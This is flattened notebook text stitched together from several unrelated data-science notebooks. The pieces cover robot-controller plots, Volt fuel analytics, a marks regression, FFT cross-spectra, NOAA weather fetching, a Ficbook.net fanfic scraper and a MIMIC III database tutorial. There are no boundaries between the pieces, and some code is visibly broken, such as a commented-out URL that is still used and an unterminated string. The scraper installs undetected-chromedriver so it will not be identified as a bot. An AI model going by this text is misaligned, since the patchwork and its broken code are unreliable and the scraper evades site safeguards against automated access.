code under the Eclipse Public License (EPL). 
For more information visit http://projects.coin-or.org/Ipopt ***********************************************[...]Error plotsfig, ax = plt.subplots() for name in controllers.keys(): ax.plot(controllers[name]["Q_dist1_res"]["t_sim"], controllers[name]["Q_dist1_res"]["e_sim"], label=name) ax.legend() ax.set_xlabel("t [s]") ax.set_ylabel("error") ax.set_yscale("log") ax.set_title("Q\_dist1") import nice_plotting nice_plotting.latexify(fig_width=3.5,fig_height=1.2) fig, ax = plt.subplots() for name in controllers.keys(): ax.plot(controllers[name]["Q_dist2_res"]["t_sim"], controllers[name]["Q_dist2_res"]["e_sim"], label=name) ax.legend() ax.set_xlabel("t [s]") ax.set_ylabel("${e}_Q$") ax.set_yscale("log") nice_plotting.format_axes(ax) plt.savefig("e_Q_error.pdf",bbox_inches="tight") fig, ax = plt.subplots() for name in controllers.keys(): ax.plot(controllers[name]["T_dist1_res"]["t_sim"], controllers[name]["T_dist1_res"]["e_sim"], label=name) ax.legend() ax.set_xlabel("t [s]") ax.set_ylabel("error") ax.set_yscale("log") ax.set_title("T\_dist1") nice_plotting.latexify(fig_width=3.5,fig_height=1.2) fig, ax = plt.subplots() for name in controllers.keys(): ax.plot(controllers[name]["T_dist2_res"]["t_sim"], controllers[name]["T_dist2_res"]["e_sim"], label=name) ax.legend() ax.set_xlabel("t [s]") ax.set_ylabel("${e}_T$") ax.set_yscale("log") nice_plotting.format_axes(ax) plt.savefig("e_T_error.pdf",bbox_inches="tight") fig, ax = plt.subplots() for name in controllers.keys(): ax.plot(controllers[name]["T_dist3_res"]["t_sim"], controllers[name]["T_dist3_res"]["e_sim"], label=name) ax.legend() ax.set_xlabel("t [s]") ax.set_ylabel("error") ax.set_yscale("log") ax.set_title("T\_dist3")Seeing the pathsThe black line is the end-effector position, the red line is 0.1 in x direction from the end-effector center, green is y and blue is z.%matplotlib notebook nice_plotting.latexify(fig_width=3.5) ax = common_plots.frame_3d(controllers["qp"]["Q_dist2_res"],T_des=T_des) #ax.set_title("QP($e_Q$)") ax.set_xlim([-0.5, 1.]) ax.set_ylim([-0.5, 1.]) ax.set_zlim([0., 1]) ax.set_zlabel("z [m]") #nice_plotting.format_axes(ax) plt.savefig("e_Q_traj.pdf",bbox_inches="tight",pad_inches=0.25) nice_plotting.latexify(fig_width=3.5) ax = common_plots.frame_3d(controllers["qp"]["T_dist2_res"],T_des=T_des) #ax.set_title("QP($e_Q$)") ax.set_xlim([-0.5, 1.]) ax.set_ylim([-0.5, 1.]) ax.set_zlim([0., 1]) ax.set_zlabel("z [m]") #nice_plotting.format_axes(ax) plt.savefig("e_T_traj.pdf",bbox_inches="tight", pad_inches=0.25) ax = common_plots.frame_3d(controllers["pinv"]["Q_dist2_res"],T_des=T_des) ax.set_title("PINV(Q\_dist2)") ax = common_plots.frame_3d(controllers["pinv"]["T_dist2_res"],T_des=T_des) ax.set_title("PINV(T\_dist2)") def ms_format(t): return "{:.2f} ms".format(1000.0*t) for cnstr_key in cnstr_situations.keys(): print("Constraint: "+str(cnstr_key)) for cntrl_key in controllers.keys(): print("\tController: "+str(cntrl_key)) print("\t\tInitial: "+ms_format(controllers[cntrl_key][cnstr_key+"_res"]["t_run_sim"][0])) print("\t\tAverage: "+ms_format(cs.np.mean(controllers[cntrl_key][cnstr_key+"_res"]["t_run_sim"]))) def ms_format(t): return"{:.2f} ms".format(1000.0*t) cntrllrs_tab = ["pinv","qp","nlp","mpc"] tab_str = "& PINV & QP & NLPC & MPC\\\\ \n\midrule\n" tab_str += "Initial ($\\bm{e}_Q$)" for cntrl_key in cntrllrs_tab: tab_str += "& "+ms_format(controllers[cntrl_key]["Q_dist2_res"]["t_run_sim"][0]) tab_str += "\\\\\n" tab_str += "Average ($\\bm{e}_Q$)" for cntrl_key in cntrllrs_tab: tab_str += "& 
"+ms_format(cs.np.mean(controllers[cntrl_key]["Q_dist2_res"]["t_run_sim"])) tab_str += "\\\\\n" tab_str += "Initial ($\\bm{e}_T$)" for cntrl_key in cntrllrs_tab: tab_str += "& "+ms_format(controllers[cntrl_key]["T_dist2_res"]["t_run_sim"][0]) tab_str += "\\\\\n" tab_str += "Average ($\\bm{e}_T$)" for cntrl_key in cntrllrs_tab: tab_str += "& "+ms_format(cs.np.mean(controllers[cntrl_key]["T_dist2_res"]["t_run_sim"])) print(tab_str)& PINV & QP & NLPC & MPC\\ \midrule Initial ($\bm{e}_Q$)& 0.07 ms& 0.68 ms& 3.58 ms& 21.13 ms\\ Average ($\bm{e}_Q$)& 0.05 ms& 0.24 ms& 2.93 ms& 17.94 ms\\ Initial ($\bm{e}_T$)& 0.06 ms& 0.60 ms& 4.15 ms& 17.45 ms\\ Average ($\bm{e}_T$)& 0.04 ms& 0.25 ms& 2.94 ms& 159.76 msVolt Analytics Import Dependenciesimport os import datetime as dt import numpy as np import pandas as pd import pygsheets #authorization gc = pygsheets.authorize(service_file='volt-metrics-creds.json') pd.set_option('display.max_rows', 500) currentDate = dt.datetime.today().date() currentDateRead in CSV files#Volt Daily Data voltDailyData = pd.read_csv('data/voltdailydata_' + currentDate.strftime('%Y%m%d') + '.csv') voltDailyData['Date'] = pd.to_datetime(voltDailyData['Date']) voltDailyData['Date'] = voltDailyData['Date'].dt.date voltDailyData.head() # Calculate total ICE (Internal Combustion Engine) miles driven voltDailyData = voltDailyData.rename(columns = {'MilesDriven':'TotalMilesDriven'}) voltDailyData['TotalICEMiles'] = voltDailyData['TotalMilesDriven'] - voltDailyData['EvMilesDriven'] voltDailyData.head() # Create new DailyMPG Column, round values after adding new column voltDailyData['DailyMPG'] = voltDailyData['TotalMilesDriven'] / voltDailyData['GallonsBurned'] voltDailyData['DailyMPG'] = pd.to_numeric(voltDailyData['DailyMPG'], errors='coerse') voltDailyData = voltDailyData.replace(np.nan, 0) voltDailyData = voltDailyData.round(2) voltDailyData.head() # Add '250+' miles to any DailyMPG value that has a value of infinity # Why 250+? 
That's the "infinity mileage" that the Volt displays in the car voltDailyData = voltDailyData.replace(np.inf, 250) voltDailyData.tail() voltDailyData.info() RangeIndex: 333 entries, 0 to 332 Data columns (total 6 columns): Date 333 non-null object TotalMilesDriven 333 non-null float64 EvMilesDriven 333 non-null float64 GallonsBurned 333 non-null float64 TotalICEMiles 333 non-null float64 DailyMPG 333 non-null float64 dtypes: float64(5), object(1) memory usage: 15.7+ KBVolt Readings#Volt Readings throughout the day (usually two), convert Timestamp to datetime object voltReadings = pd.read_csv('data/voltdata_' + currentDate.strftime('%Y%m%d') + '.csv') voltReadings.rename(columns = {'LocalTimestamp':'Date', 'GallonsBurned': 'LifeTimeGalBurned'}, inplace=True) voltReadings['Date'] = pd.to_datetime(voltReadings['Date']) voltReadings.head() # Select only columns desired voltReadings = voltReadings[['Date', 'LifeTimeGalBurned', 'LifetimeFuelEcon', 'LifetimeEvMiles','LifetimeMiles']] # Calculate LifetimeICEMiles voltReadings['LifetimeICEMiles'] = voltReadings['LifetimeMiles'] - voltReadings['LifetimeEvMiles'] # Sort based on timestamp, reorder columns, round values voltReadings.sort_values(by='Date', inplace=True) voltReadings = voltReadings[['Date', 'LifeTimeGalBurned','LifetimeFuelEcon','LifetimeEvMiles','LifetimeICEMiles','LifetimeMiles']] voltReadings = voltReadings.round(2) voltReadings['Date'] = voltReadings.Date.dt.normalize() voltReadings.head() # Drop dupes based on date column voltReadings.drop_duplicates(subset='Date', keep='last', inplace=True) voltReadings.head() # Combine dataframes based on date indexes voltStats = pd.concat([voltReadings.set_index('Date'),voltDailyData.set_index('Date')], join='inner', axis=1) voltStats.tail() #Remove rows that show 0 for TotalMilesDriven, EvMilesDriven, GallonsBurned, TotalICEMiles, DailyMPG (Days not driven) voltStats = voltStats[voltStats.DailyMPG != 0] voltStats.tail() # Check info on columns voltStats['Date'] = voltStats.index voltStats.info() # Write voltStats DF to CSV voltStats.to_csv('output/voltstats.csv', encoding='utf-8') #open the google spreadsheet (where 'VoltStats' is the name of my sheet) sh = gc.open('VoltStats') #select the first sheet wks = sh[0] voltStats['Date'] = voltStats['Date'].dt.strftime('%Y-%m-%d') #update the first sheet with df, starting at cell B2. wks.set_dataframe(voltStats,(1,1)) Task-1: To Explore Supervised Machine LearningA regression model that predicts the percentage of marks a student is expected to score based upon the number of hours they study.import numpy as np import pandas as pd import matplotlib.pyplot as plt %matplotlib inline data = pd.read_csv('marks_data.csv') data.head() data.info() data.describe() data.shapeRelation between Independent and Target Variableplt.scatter(data['Hours'], data['Scores']) plt.xlabel("Number of Hours") plt.ylabel("Scores") plt.title("Hours vs Scores") plt.show()**Observation:** We can clearly see that the number of hours studied is linearly related to the score of the student.
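To quantify this visual impression before fitting a model, one can also check the linear correlation directly. A minimal sketch, assuming the same `data` DataFrame with its `Hours` and `Scores` columns:

```python
# Pearson correlation between study hours and scores; a value close to +1
# supports the linear relationship seen in the scatter plot above.
print(data['Hours'].corr(data['Scores']))
```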
Data allotment for traning and testingfrom sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(data['Hours'].values.reshape(-1,1), data['Scores'], test_size = 0.2, random_state = 42) X_train.shape, y_train.shape, X_test.shape, y_test.shapeTraining the Modelfrom sklearn.linear_model import LinearRegression model = LinearRegression() model.fit(X_train, y_train)Plotting of graphcoefficient = model.coef_ intercept = model.intercept_ # Since, y = m*x + c line = (data['Hours'].values * coefficient) + intercept plt.scatter(data.Hours, data.Scores) plt.plot(data.Hours, line) plt.show() pred = model.predict(X_test) predComparing predicted and attained valuespred_compare = pd.DataFrame({'Actual Values': y_test, 'Predicted Values':pred}) pred_compareFinal evaluationfrom sklearn import metrics print("Mean Absolute Error: ", metrics.mean_absolute_error(y_test, pred)) print("Mean Squared Error: ", metrics.mean_squared_error(y_test, pred)) print("Root Mean Squared Error: ", metrics.mean_squared_error(y_test, pred)**0.5) print("R2 Score: ", metrics.r2_score(y_test, pred))Mean Absolute Error: 3.9207511902099244 Mean Squared Error: 18.943211722315272 Root Mean Squared Error: 4.352380006653288 R2 Score: 0.9678055545167994**Assuming student studies for 7.5 hours a day**hours = np.asarray(7.5).reshape(-1,1) print(f"{model.predict(hours)[0]} will be predicted score if a student study for 7.5 hrs in a day.") ## Conclusion: Model successfully predicts the expected values using supervised machine learning.Cross Spectral Analysisimport numpy as np import matplotlib.pyplot as plt from scipy.fft import fft, fftfreq, fftshift t = np.linspace(0,50,1000) t.shape[-1] x = np.sin(t) + np.sin(2*t)+ np.sin(4*t)+ np.sin(5*t)+ np.sin(6*t) y = np.sin(3*t)+ np.sin(2*t)+ np.sin(4*t)+ np.sin(7*t)+ np.sin(9*t) plt.plot(x) plt.plot(y)$$F_{x}( k) \ =C_{xk} e^{i\theta _{xk}} \ e^{i\frac{2\pi }{T} kt} =\ \ \frac{1}{2}( A_{xk} -iB_{xk}) e^{i\frac{2\pi }{T} kt}$$Fx = fftshift(fft(x)) Fy = fftshift(fft(y)) Ffreq = fftshift(fftfreq(t.shape[-1])) plt.plot(Ffreq, Fx.real, Ffreq, Fy.real)$$co-spectra\ =\ A_{xk} A_{yk} +B_{xk} B_{yk}$$Cxy = Fx.real*Fy.real + Fx.imag*Fy.imag plt.plot(Cxy)$$quad-spectra\ =\ A_{xk} B_{yk} -A_{yk} B_{xk}$$Qxy = Fx.real*Fy.imag - Fx.imag*Fy.real plt.plot(Qxy) enumerate(Cxy) cross = [np.complex(i, j) for index, [i,j] in zip(enumerate(Cxy),enumerate(Qxy))] plt.plot(cross)C:\Users\starlord\anaconda3\lib\site-packages\numpy\core\_asarray.py:83: ComplexWarning: Casting complex values to real discards the imaginary part return array(a, dtype, copy=False, order=order)PJM 180 gigawattsMore than 1,000 companies are members of PJM, which serves 65 million customers and has 180 gigawatts of generating capacity. With 1,376 generation sources, 84,236 miles (135,560 km) of transmission lines and 6,038 transmission substations, PJM delivered 807 terawatt-hours of electricity in 2018.#https://learn.pjm.com/who-is-pjm/where-we-operate.aspx import matplotlib.pyplot as plt img_path = 'PJM.png' img_p = plt.imread(img_path) plt.figure(figsize=(20,10)) plt.imshow(img_p)**Get 100 stations for state and eventually send each id to the python script below to get the weather reported for each id**Get a Subset of StationsThere are certain filters that can be applied. You can limit stations to a certain geographical location using a FIPS (Federal Information Processing System) code. 
I don't know if there's a central source for these codes, but here are some.Since it's an excel sheet and not everyone can open it, here's a portion of it reproduced:01 - Alabama|02 - Alaska|04 - Arizona|05 - Arkansas|06 - California|08 - Colorado|09 - Connecticut|**10 - Delaware|****11 - District of Columbia|**12 - Florida|13 - Georgia|15 - Hawaii|16 - Idaho|**! 17 - Illinois|**18 - Indiana|19 - Iowa|20 - Kansas|**! 21 - Kentucky|**22 - Louisiana|23 - Maine|**24 - Maryland|**25 - Massachusetts|**! 26 - Michigan|**27 - Minnesota|28 - Mississippi|29 - Missouri|30 - Montana|31 - Nebraska|32 - Nevada|33 - New Hampshire|**34 - New Jersey|**35 - New Mexico|36 - New York|**! 37 - North Carolina|**38 - North Dakota|**39 - Ohio|**40 - Oklahoma|41 - Oregon|**42 - Pennsylvania|**44 - Rhode Island|45 - South Carolina|46 - South Dakota|47 - Tennessee|48 - Texas|49 - Utah|50 - Vermont|**51 - Virginia|**53 - Washington|**54 - West Virginia|**55 - Wisconsin|56 - Wyoming|token= {'token':""} import requests import json import pandas as pd FIPS = [34,42,39,10,11,24,51,54] FIPS2 = [17,21,26,37] state = ['New Jersey','Pennsylvania','Ohio', 'Delaware','District of Columbia', 'Maryland','Virginia','West Virginia'] df_fips = pd.DataFrame() for index, location in enumerate(FIPS): url = f'https://www.ncdc.noaa.gov/cdo-web/api/v2/stations?locationid=FIPS:{location}&limit=100&sortfield=mindate' r = requests.get(url, headers=token) print(location,r) response = r.json() df = pd.DataFrame.from_dict(response['results']) df['state'] = state[index] df_fips = pd.concat([df_fips,df]) df_fips[['location_type','location']] = df_fips['id'].apply(lambda x: pd.Series(str(x).split(":")))* The National Weather Service Cooperative Observer Program (COOP)* Global Historical Climatology Network Daily (GHCND)* Next-Generation Radar (NEXRAD) is a network of 159 high-resolution S-band Doppler weather radars operated by the National Weather Service* Weather Bureau Army Navy (WBAN)df_fips.groupby('location_type').count() df_fips.to_csv('station_details_addition.csv',sep='|',index=False) GHCND = df_fips[df_fips['location_type']=='GHCND'] GHCDN_list = sorted(GHCND['location'].tolist(),reverse=True) len(GHCDN_list) import json with open('config.json') as conf_file: config = json.load(conf_file) config['params']['weather_stations'] = GHCDN_list with open('config_new.json', 'w') as json_file: json.dump(config, json_file,indent=1) limit = 1000 base_url = f"https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&limit={limit}&stationid=GHCND:" weather_stations = GHCDN_list weather_features = ["station_dt_key","date","station","PRCP","SNOW","SNWD","AWND","TMAX","TMIN"] start_date = "-01-01" end_date = "-12-31" import time import requests import pandas as pd import json not_found = [] def get_url(url,token,station,year): r = requests.get(url, headers=token) print(r) try: response = r.json() except: print(f'Error {station}') station_not_found = {'url':url,'station':station,'year':year,'error':r} not_found.append(station_not_found) return None if bool(response): count = response['metadata']['resultset']['count'] print(count) return count else: print(f'No Records Found for {station}') station_not_found = {'url':url,'station':station,'year':year} not_found.append(station_not_found) return None def fetch_weather_data(base_url, weather_stations,start_date, end_date, token): years = ['2020'] df_stations = pd.DataFrame() for year in years: for index, station in enumerate(weather_stations): offset = 0 print(f'{index}: ',station, year) # url = 
f'{base_url}{station}&units=standard&startdate={year}{start_date}&enddate={year}{end_date}&includemetadata=True' #url = (base_url + station + '&startdate=' + start_date + '&enddate=' # + end_date + f'&units=standard&limit=50&offset={offset}&%includemetadata=True') count = get_url(url,token,station,year) if bool(count): while offset <= count: loop_url = f'{base_url}{station}&offset={offset}&units=standard&startdate={year}{start_date}&enddate={year}{end_date}' print(loop_url) r = requests.get(loop_url, headers=token) #print(r) try: response = r.json() interval_data = reformat_data(r.text) df_stations = pd.concat([df_stations,interval_data]) offset = offset + limit print('-- done.') except: continue #sleep for 10 seconds to avoid going over rate limit. time.sleep(10) return df_stations def reformat_data(json_text): """ Convert data to denormalized pandas dataframe. This format will allow easier analysis and better fit within a typical data warehouse schema. """ #convert records from nested json to flat pandas dataframe. api_records = json.loads(json_text)['results'] df = pd.pivot_table(pd.DataFrame(api_records), index=['date', 'station'], columns='datatype', values='value') reshaped_df = df.rename_axis(None, axis=1).reset_index() #clean up the date and station fields #reshaped_df.date = reshaped_df.date.str.slice(0, 10) #reshaped_df.station = reshaped_df.station.str.slice(6, 17) #add a primary key for useful for updating/inserting records in a database. reshaped_df['station_dt_key']=reshaped_df['station'].astype(str)+'_'+reshaped_df['date'].str.slice(0, 10) #filter for requested features, replace NAs with 0. final_df = reshaped_df.filter(items=weather_features) final_df.fillna(0.0) return final_df df_stations = fetch_weather_data(base_url,weather_stations,start_date,end_date,token)0: USW00093725 2020 No Records Found for USW00093725 1: USW00014773 2020 No Records Found for USW00014773 2: USW00014767 2020 No Records Found for USW00014767 3: USW00014734 2020 2541 https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&limit=1000&stationid=GHCND:USW00014734&offset=0&units=standard&startdate=2020-01-01&enddate=2020-12-31 -- done. https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&limit=1000&stationid=GHCND:USW00014734&offset=1000&units=standard&startdate=2020-01-01&enddate=2020-12-31 -- done. https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&limit=1000&stationid=GHCND:USW00014734&offset=2000&units=standard&startdate=2020-01-01&enddate=2020-12-31 -- done. 
4: USW00013781 2020 2534 https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&limit=1000&stationid=GHCND:USW00013781&offset=0&units=standard&startdate=2020-01-01&enddate=2020-12-31 -- done.[...]**Output for above**export_not_found = pd.DataFrame(not_found) export_not_found.to_csv('2020_kickout_new.csv',sep='|',index=False) export_not_found import matplotlib as plot import seaborn as sns df_stations df_stations.to_csv('Raw_2020_NOAA_new.csv',sep='|',index=False) clean_df_stations = df_stations.drop_duplicates('station_dt_key').fillna(0) clean_df_stations['date'] = clean_df_stations['date'].apply(lambda x: x[:10]) clean_df_stations['month'] = clean_df_stations['date'].apply(lambda x: x[5:7]) clean_df_stations['TDIFF'] = clean_df_stations['TMAX'] - clean_df_stations['TMIN'] f, axes = plt.subplots(2, 4, figsize=(20, 10)) visual_data = clean_df_stations sns.lineplot(x='date',y='PRCP',data=visual_data,hue='month',ax=axes[0,0],palette='colorblind') sns.lineplot(x='date',y='AWND',data=visual_data,hue='month',ax=axes[1,0],palette='colorblind') sns.lineplot(x='date',y='SNOW',data=visual_data,hue='month',ax=axes[0,1],palette='colorblind') sns.lineplot(x='date',y='SNWD',data=visual_data,hue='month',ax=axes[1,1],palette='colorblind') sns.lineplot(x='date',y='TMAX',data=visual_data,hue='month',ax=axes[0,2],palette='colorblind') sns.lineplot(x='date',y='TMIN',data=visual_data,hue='month',ax=axes[1,2],palette='colorblind') sns.lineplot(x='date',y='TDIFF',data=visual_data,hue='month',ax=axes[0,3],palette='colorblind') sns.countplot(x='month',data=visual_data,ax=axes[1,3],palette='colorblind')PRCP = Precipitation (mm or inches as per user preference, inches to hundredths on Daily Form pdf file)SNOW = Snowfall (mm or inches as per user preference, inches to tenths on Daily Form pdf file)SNWD = Snow depth (mm or inches as per user preference, inches on Daily Form pdf file)TMAX = Maximum temperature (Fahrenheit or Celsius as per user preference, Fahrenheit to tenths onDaily Form pdf fileTMIN = Minimum temperature (Fahrenheit or Celsius as per user preference, Fahrenheit to tenths onDaily Form pdf filedf_complete = clean_df_stations.merge(df_fips,left_on='station',right_on='id',how='left') df_complete df_complete.to_csv('2016_NOAA_addition.csv',sep='|',index=False) !pip install plotly import plotly.express as px fig = px.scatter_mapbox(df_complete, lat="latitude", lon="longitude", hover_name="station", color_discrete_sequence=["fuchsia"], zoom=3, height=700) fig.update_layout(mapbox_style="open-street-map") fig.show()FFNet metadata scraperThis notebook scrapes metadata from the Russian fanfic site [Ficbook.net](https://ficbook.net/). 
To make it work, put the URL for a particular fandom page (everything up to `&p=`) in as the *ScraperStem* value below, and set the range to be (1,some-number), where some-number is the final page of the paginated results for that fandom.#Install selenium for Python-based browser control import sys !{sys.executable} -m pip install selenium #Install undetected-chromedriver so you won't be identified as a bot import sys !{sys.executable} -m pip install undetected-chromedriver #You may need to run something on the Apple Terminal to make chromedriver work #xattr -d com.apple.quarantine /usr/local/bin/chromedriver #is what worked for me #Import libraries import undetected_chromedriver as uc from selenium import webdriver from selenium.webdriver.common.keys import Keys import pandas as pd from random import randint import time from time import sleep from bs4 import BeautifulSoup from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By import re #Defines list of icon ID values that don't have useful info pointlessicons = ['badge-with-icon', 'badge-secondary'] #Creates Pandas dataframe with the metadata russianfanfic = pd.DataFrame(columns=["Title", "Storylink", "AuthName", "AuthID", "Shiptype", "Rating", "Status", "Likes", "Paid", "Fandom", "Charships", "Length", "Postdate", "Tags", "Blurb"]) #Launches the Undetected Selenium driver driver = uc.Chrome()Set the ScraperStem to the first part of the page for the fandom you're interested in, below, along with the page range.#Base URL for a fandom, up to `?p=` which defines which page ScraperStem = "https://ficbook.net/fanfiction/books/harri_potter?p= #Set the range here, between 1 and the highest-number page for the fandom for i in range(1,53): #Define the full URL as the base URL + the page number ScraperURL = ScraperStem + str(i) #Print the full URL print(ScraperURL) #Load the full URL driver.get(ScraperURL); #Wait 6 seconds time.sleep(6) #Find all the spoiler / hidden tags spoilers = driver.find_elements_by_class_name('show-hidden-tags-btn') #For every spoiler / hidden tag, click the tag to show its value for x in range(0,len(spoilers)): if spoilers[x].is_displayed(): spoilers[x].click() sleep(randint(1,3)) #Get the page source pageSource = driver.page_source #Parse the page source with Beautiful Soup soup = BeautifulSoup(pageSource) #Find the container for the fics fics = soup.find_all("div", {'class': 'js-toggle-description'}) #For each fic for fic in fics: #Find the title container title = fic.find('h3', {'class': 'fanfic-inline-title'}) #Find the story link storylink = title.a['href'] #Find the text of the title title = title.text #Find the container with the ship type shiptype = fic.find('div', {'class': 'direction'}) #Find the span with the ship type badge shiptype = shiptype.find('span', {'class': 'badge-text'}) #Get the text from the ship type shiptype = shiptype.text #Get all the containers with icons icons = fic.find_all("span", {'class': 'badge-with-icon'}) #For each icon for icon in icons: #Get the class of the icon as the iconvalue iconvalues = icon["class"] #For each iconvalue for iconvalue in iconvalues: #If the iconvalue isn't in the pointlessicons list if iconvalue not in pointlessicons: #If the iconvalue includes 'badge-status' if 'badge-status' in iconvalue: #The iconvalue is the text status textstatus = iconvalue #Find a span tag with an icon rating = fic.find("strong", {'class': 'badge-with-icon'}) if rating not in pointlessicons: #Get the badge text as the rating rating = 
rating.find('span', {'class': 'badge-text'}).text #Find a span with the class badge-likes likes = fic.find("span", {"class": 'badge-like'}) if likes is not None: #If it's not empty, that's the number of likes likenumber = likes.find('span', {"class": 'badge-text'}).text else: #Otherwise assign it to empty likenumber = '' #Find a span with the class badge-translate translationicon = fic.find('span', {'class': 'badge-translate'}) #If it's not empty, then it's translated if translationicon is not None: translation = 'translated' else: #Otherwise set translation to empty translation = '' #Find a span with the class badge-reward award = fic.find("span", {"class": 'badge-reward'}) #If it's not empty, that's the award if award is not None: awardnumber = award.find('span', {"class": 'badge-text'}).text else: #Otherwise set award to empty award = '' #Find a div with the class hot-fanfic paid = fic.find("div", {"class": 'hot-fanfic'}) #If it's not empty, set it to be 'paid' if paid is not None: paid = 'paid' else: paid = '' #Find a span with the class author author = fic.find('span', {'class': 'author'}) #Author profile link is the link here authlink = author.a['href'] #Author name is the text on this link authname = author.text #Find the table with metadata tables = fic.find_all('dd') #The fandom is the second value in the table fandom = tables[1].text #If there's 5 things in the table: if len(tables) == 4: #Set character ships to empty charships = '' #Length is the third value in the table length = tables[2].text #Post date is the 4th value in teh table postdate = tables[3].text #If there's 6 things in the table if len(tables) == 5: #Character ships are the third thing charships = tables[2].text #Length is the 4th thing length = tables[3].text #Post date is the 5th thing postdate = tables[4].text #Find a div with the class tags tagbox = fic.find("div", {"class": 'tags'}) #If there are tags if tagbox is not None: #Find all links taglist = tagbox.find_all('a') #Make an empty list for tags tags = [] #For each tag in the tag list for tag in taglist: #The tag is the text of the link in the tag box tag = tag.text #Add that tag to the list of tags tags.append(tag) #Combine all the things in the tag list, separated by pipes alltags = '|'.join(tags) #Blurb is the div with fanfic-description-text blurb = fic.find('div', {'class': 'fanfic-description-text'}).text #Create a new item with the metadata that's been scraped newitem = {"Title": title, "Storylink": storylink, "AuthName": authname, "AuthID": authlink, "Shiptype": shiptype, "Rating": rating, "Status": textstatus, "Likes": likenumber, "Paid": paid, "Fandom": fandom, "Charships": charships, "Award": award, "Translation": translation, "Length": length, "Postdate": postdate, "Tags": alltags, "Blurb": blurb} #Add the item to the Pandas dataframe russianfanfic = russianfanfic.append(newitem, ignore_index=True) #Wait 3-10 seconds before loading the new page sleep(randint(3,10)) #Display the results russianfanfic #Remove newlines and tabs cleanrussianfanfic = russianfanfic.replace(to_replace=[r"\\t|\\n|\\r", "\t|\n|\r"], value=[" "," "], regex=True, inplace=False) cleanrussianfanfic cleanrussianfanfic.to_tsv('/Users/qad/Documents/russianfanfic-2020-04.tsv', index=False, sep="\t")A Quick Look at the MIMIC III Data Setimport warnings warnings.simplefilter("ignore") from cdsutils.mutils import * from cdsutils.pg import * #from dminteract.modules.m5 import * import numpy as np import numpy.random as ra import ipywidgets as ipw from getpass import getpassMIMIC 
III data are stored in a relational database. This is not an exploration of relational database theory or data modeling, but here is my novice quick description.* Relational databases seek to achieve accurate data representation by eliminating (reducing) data redundancies and thus the opportunities for data inconsistencies.This is achieved by splitting data across **tables** and then **joining** the data back together when required. First we need to generate a connection to the MIMIC databaseAs you work through this notebook, you might occasionally get an error that looks something like this (although much longer):```PythonOperationalError: (psycopg2.OperationalError) server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request.```This just means that the connection with the database has timed out. All you need to do is come back up here and rerun the code below to get a new database connection.conn = ibis.postgres.connect( user=input("under your University of Melbourne username"), password=getpass("enter your password provided by Brian (not your physionet password and not your University of Melbourne password)"), host='agsfczqlcan.db.cloud.edu.au', port=5432, database='mimic') schema= "mimiciii" # ibis.options.interactive = TrueLet's take a look at the tables>Before you can do anything, you have to understand tables. If you don't have a table, you have nothing to work on. The table is the standard unit of information in a relational database. Everything revolves around tables. Tables are composed of rows and columns. And while that sounds simple, the sad truth is that tables are not simple. (*The Definitive Guide to SQLite*, p. 80 [owens2006definitive})Since I said data are split across tables, let's look at the tables in the MIMIC II demo database. Take a look at the Tables in the DatabaseHTML(dlist(conn.list_tables(schema=schema), ncols=7, sort=True))`chartevents` is where the vast majority of data in MIMIC III is contained. Consequently, PostgreSql implements this table using a [partioned design](https://www.postgresql.org/docs/12/ddl-partitioning.html). This clutters are view somewhat, so let's use some python to clean up our view by excluding the pieces `chartevents` is split into.ta = conn.table("admissions", schema=schema) ta.admission_type.distinct().execute() HTML(dlist([t for t in conn.list_tables(schema=schema) if "chartevents_" not in t], ncols=6, sort=True))MIMIC III is well documented- You can read about each table [here](https://mimic.physionet.org/mimictables/).- As an example we can look at [microbiologyevents](https://mimic.physionet.org/mimictables/microbiologyevents/) What are in the tables? Ibis Provides two ways to see the definitions of each table1. `info()`1. `schema()1 `info`t = conn.table("icustays", schema=schema) t.info()This is fairly ugly output, but tells us quite a bit about the table- `Column`: This is the column name- `Type`: This provides two pieces of information - The data type used to represent the data (e.g. 
`int32` (a 32 bit integer) - Whether the value is `nullable` (can be missing) - Example: `row_id` is represented with a 32 bit integer and CANNOT be missing - Example: `outtime` is represented with a `TimeStamp` and CAN be missing- `Non-NULL `: The number of rows in the table with non-NULL values for that column `schema()``schema()` returns a dictionary-like object that provides the column names and the data tuype for the column, but does not provide any information about whether the value can be missing or not.view_dict(t.schema()) view_table("diagnoses_icd", conn)Take a look at [`patients`](https://mimic.physionet.org/mimictables/patients/)view_table("patients", conn)The [documentation](https://mimic.physionet.org/mimictables/patients/) tell us that this table links to `admission` and `icustays` vis the `subject_id` value.There are three different date of death columns. You can read about the differences and decide which value you would want to use.- `NaT` represents a __missing time__.- `gender`: `GENDER is the genotypical sex of the patient`According to the WHO>Humans are born with 46 chromosomes in 23 pairs. The X and Y chromosomes determine a person’s sex. Most women are 46XX and most men are 46XY. Research suggests, however, that in a few births per thousand some individuals will be born with a single sex chromosome (45X or 45Y) (sex monosomies) and some with three or more sex chromosomes (47XXX, 47XYY or 47XXY, etc.) (sex polysomies). In addition, some males are born 46XX due to the translocation of a tiny section of the sex determining region of the Y chromosome. Similarly some females are also born 46XY due to mutations in the Y chromosome. Clearly, there are not only females who are XX and males who are XY, but rather, there is a range of chromosome complements, hormone balances, and phenotypic variations that determine sex. (["Gender and Genetics"](https://www.who.int/genomics/gender/en/index1.html:~:text=The%20X%20and%20Y%20chromosomes,47XYY%20or%2047XXY%2C%20etc.)))So how many different genders are in the database?We can use the `dictinct` method to get the unique values in a column:t_pat = conn.table("patients", schema=schema) t_pat['gender'].distinct().execute(limit=None) t_pat.filter([t_pat.gender=='M']).count().execute(limit=None)How many total patients are there?- `count()` counts the number of rows in the table- A Note about execute:t_pat.count().execute(limit=None)Look at [`admissions`](https://mimic.physionet.org/mimictables/admissions/)view_table("admissions", conn)In addition to the admission, and discharge information, this table also contains demographic information. 
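As a quick illustration of those demographic columns, the same ibis patterns used above for `gender` apply here as well. A minimal sketch, assuming the standard MIMIC-III `admissions` columns such as `insurance` (the value `'Medicare'` below is just an example of one expected category):

```python
t_adm = conn.table("admissions", schema=schema)

# Distinct values of a demographic column (mirrors the gender example above)
t_adm['insurance'].distinct().execute(limit=None)

# Count admissions recorded with one particular insurance value
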